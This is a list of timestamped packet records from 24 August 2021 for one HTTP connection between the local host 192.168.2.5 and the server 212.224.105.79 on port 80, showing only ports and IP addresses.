Aug 24, 2021 08:49:17.501602888 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.501622915 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.501631975 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.501641989 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.501658916 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.501674891 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.501689911 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.501693010 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.501708984 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.501725912 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.501739979 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.501741886 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.501760960 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.501775980 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.501779079 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.501796007 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.501804113 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.501811028 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.501827955 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.501837969 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.501843929 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.501859903 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.501868963 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.501876116 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.501894951 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.501904011 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.501913071 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.501929045 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.501935959 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.501945972 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.501961946 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.501977921 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.501993895 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.502005100 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.502011061 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.502029896 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.502048016 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.502048016 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.502063036 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.502079010 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.502079964 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.502094984 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.502106905 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.502110004 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.502144098 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.521657944 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.521708965 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.521728992 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.521745920 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.521761894 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.521783113 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.521800995 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.521817923 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.521822929 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.521835089 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.521852016 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.521867990 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.521877050 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.521883965 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.521900892 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.521956921 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.522767067 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.524199009 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.524228096 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.524241924 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.524254084 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.524271965 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.524288893 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.524305105 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.524323940 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.524333000 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.524343014 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.524360895 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.524375916 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.524388075 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.524391890 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.524408102 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.524418116 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.524424076 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.524441004 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.524455070 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.524460077 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.524477959 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.524486065 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.524493933 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.524511099 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.524518967 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.524527073 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.524543047 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.524559021 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.524574041 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.524588108 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.524593115 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.524610996 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.524626970 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.524633884 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.524642944 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.524660110 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.524669886 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.524676085 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.524692059 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.524708986 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.524729013 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.524730921 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.524746895 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.524763107 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.524779081 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.524780035 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.524795055 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.524811029 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.524816036 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.524826050 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.524843931 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.524852037 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.524863958 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.524874926 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.524882078 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.524898052 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.524913073 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.524914980 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.524931908 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.524939060 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.524947882 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.524965048 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.524981976 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.525002003 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.525008917 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.525018930 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.525036097 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.525052071 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.525058985 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.525068998 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.525084972 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.525093079 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.525100946 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.525116920 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.525131941 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.525135994 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.525154114 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.525166035 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.525170088 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.525186062 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.525193930 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.525202036 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.525218964 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.525228977 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.525234938 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.525252104 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.525271893 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.525278091 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.525290012 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.525305986 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.525324106 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.525326967 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.525340080 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.525357008 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.525362015 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.525372982 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.525389910 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.525397062 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.525408983 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.525424004 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.525434017 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.525450945 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.525477886 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.525494099 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.525496006 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.525512934 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.525532961 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.525549889 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.525553942 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.525567055 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.525578976 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.525583982 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.525599957 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.525613070 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.525615931 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.525633097 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.525649071 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.525655031 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.525669098 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.525686026 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.525686026 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.525702953 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.525719881 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.525726080 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.525736094 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.525752068 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.525758982 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.525768042 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.525784016 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.525784969 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.525805950 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.525818110 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.525825024 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.525840998 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.525856018 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.525856972 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.525873899 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.525888920 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.525892019 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.525904894 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.525921106 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.525928020 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.525940895 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.525959015 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.525965929 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.525974989 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.525989056 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.525989056 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.526005030 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.526025057 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.526026964 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.526042938 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.526060104 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.526061058 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.526077032 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.526093960 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.526098013 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.526110888 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.526128054 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.526144028 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.526149988 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.526163101 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.526180983 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.526196957 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.526212931 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.526221037 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.526230097 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.526247025 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.526254892 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.526262999 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.526281118 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.526281118 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.526300907 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.526314974 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.526319027 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.526335001 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.526349068 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.526351929 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.526367903 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.526382923 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.526384115 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.526401997 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.526417971 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.526417971 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.526437044 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.526451111 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.526454926 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.526473045 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.526483059 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.526485920 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.526501894 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.526521921 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.526525021 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.526540041 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.526554108 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.526555061 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.526572943 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.526588917 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.526591063 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.526604891 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.526621103 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.526627064 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.526637077 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.526650906 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.526657104 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.526674986 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.526685953 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.526691914 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.526709080 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.526725054 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.526727915 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.526746988 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.526753902 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.526763916 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.526779890 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.526788950 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.526801109 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.526818991 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.526822090 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.526834965 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.526850939 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.526853085 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.526868105 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.526884079 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.526901007 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.526917934 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.526921034 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.526937962 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.526957035 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.526964903 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.526973009 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.526989937 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.527005911 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.527010918 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.527021885 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.527038097 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.527045012 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.527055025 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.527066946 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.527070045 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.527079105 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.527091026 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.527102947 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.527132988 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.527151108 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.527178049 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.527206898 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.544059038 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.544090033 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.544102907 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.544120073 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.544137001 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.544153929 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.544159889 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.544186115 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.544219971 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.549309015 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.549336910 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.549350977 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.549364090 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.549376965 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.549393892 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.549413919 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.549432039 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.549447060 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.549451113 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.549463987 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.549480915 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.549498081 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.549515009 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.549531937 CEST	80	49712	212.224.105.79	192.168.2.5
